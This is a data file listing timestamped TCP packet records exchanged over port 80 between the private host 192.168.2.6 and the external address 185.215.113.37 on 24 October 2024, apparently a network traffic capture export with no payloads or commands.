Oct 24, 2024 13:02:18.405448914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.405675888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.405698061 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.405719995 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.405740976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.405754089 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.405772924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.405797005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.406461954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.406481028 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.406505108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.406519890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.406527996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.406544924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.406569958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.407283068 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.407303095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.407327890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.407344103 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.407351971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.407373905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.407392979 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.407409906 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.407435894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.408175945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.408201933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.408222914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.408243895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.408262968 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.408314943 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.408994913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409013987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409035921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409058094 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.409066916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409076929 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.409095049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409107924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.409820080 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409842014 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409862995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.409869909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409888983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.409898996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.409914017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.409934998 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.410666943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.410686016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.410703897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.410717010 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.410737038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.410753965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.410763025 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.410782099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.410805941 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.411509037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.411533117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.411552906 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.411571026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.411581039 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.411602020 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.411613941 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.411644936 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.412338018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.412360907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.412378073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.412403107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.412410021 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.412427902 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.412436962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.412446976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.412465096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.412499905 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.413187981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.413209915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.413229942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.413245916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.413253069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.413265944 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.413347960 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.413970947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414036036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414057016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414078951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414103031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414108992 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.414138079 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.414906979 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414927006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414949894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414969921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.414978027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.414985895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.415018082 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.415747881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.415771008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.415788889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.415811062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.415821075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.415832043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.415849924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.415884972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.416555882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.416575909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.416598082 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.416606903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.416620970 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.416636944 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.416647911 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.416666031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.416702032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.417409897 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.417432070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.417454004 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.417462111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.417470932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.417490005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.417500973 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.418517113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.418539047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.418555021 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.418566942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.418585062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.418595076 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.418615103 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.418627977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.418634892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.418997049 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.419034958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.419322968 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.419346094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.419362068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.419374943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.419389963 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.419403076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.419411898 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.419429064 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.419464111 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.444792986 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.444889069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.444902897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.444912910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.444952011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.445058107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.445106983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.524156094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.524214029 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.524266958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.524288893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.524311066 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.524341106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.524580002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.524600983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.524620056 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.524630070 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.524645090 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.524657011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.524667025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.524687052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.524724960 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525237083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525255919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525279045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525294065 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525310040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525316000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525332928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525341988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525358915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525374889 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525748014 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525793076 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525834084 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525856018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525875092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525892019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525902033 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525918007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.525926113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.525953054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.526782036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.526803017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.526829958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.526838064 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.526845932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.526859045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.526875019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.526887894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.526902914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.526911020 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.526930094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.526937962 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.526946068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.526963949 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.526976109 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.527009964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.527724981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.527745008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.527770996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.527781010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.527800083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.527806997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.527817011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.527832985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.527842045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.527859926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.527872086 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.527888060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.527895927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.527925014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.528695107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.528716087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.528734922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.528753042 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.528762102 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.528779984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.528798103 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.528805971 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.528824091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.528850079 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.529587030 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.529607058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.529628992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.529637098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.529654026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.529664040 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.529680014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.529699087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.529705048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.529722929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.529742956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.529762983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.529772043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.529797077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.529827118 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.530535936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.530555964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.530577898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.530586958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.530606985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.530613899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.530627966 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.530639887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.530648947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.530666113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.530683994 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.530705929 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.530752897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.531456947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.531476974 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.531497955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.531516075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.531526089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.531550884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.531557083 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.531574965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.531584024 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.531601906 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.531620979 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.532397985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.532413006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.532430887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.532448053 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.532457113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.532474995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.532485008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.532495975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.532511950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.532531023 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.532540083 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.532557011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.532572031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.532593966 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.533338070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.533358097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.533377886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.533385992 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.533404112 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.533411980 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.533430099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.533437014 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.533451080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.533464909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.533478975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.533492088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.533504009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.533529997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.534262896 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.534281969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.534305096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.534313917 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.534331083 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.534339905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.534349918 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.534365892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.534380913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.534393072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.534404993 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.534420967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.534434080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.534460068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.535212040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.535231113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.535252094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.535260916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.535279989 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.535286903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.535299063 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.535322905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.535329103 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.535346985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.535365105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.535372972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.535387039 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.535403967 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.536165953 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.536183119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.536206961 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.536226988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.536241055 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.536252975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.536262035 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.536278963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.536298037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.536308050 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.536339045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.537077904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.537098885 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.537117958 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.537132025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.537154913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:18.537508011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:18.537523031 CEST	80	49711	185.215.113.37	192.168.2.6
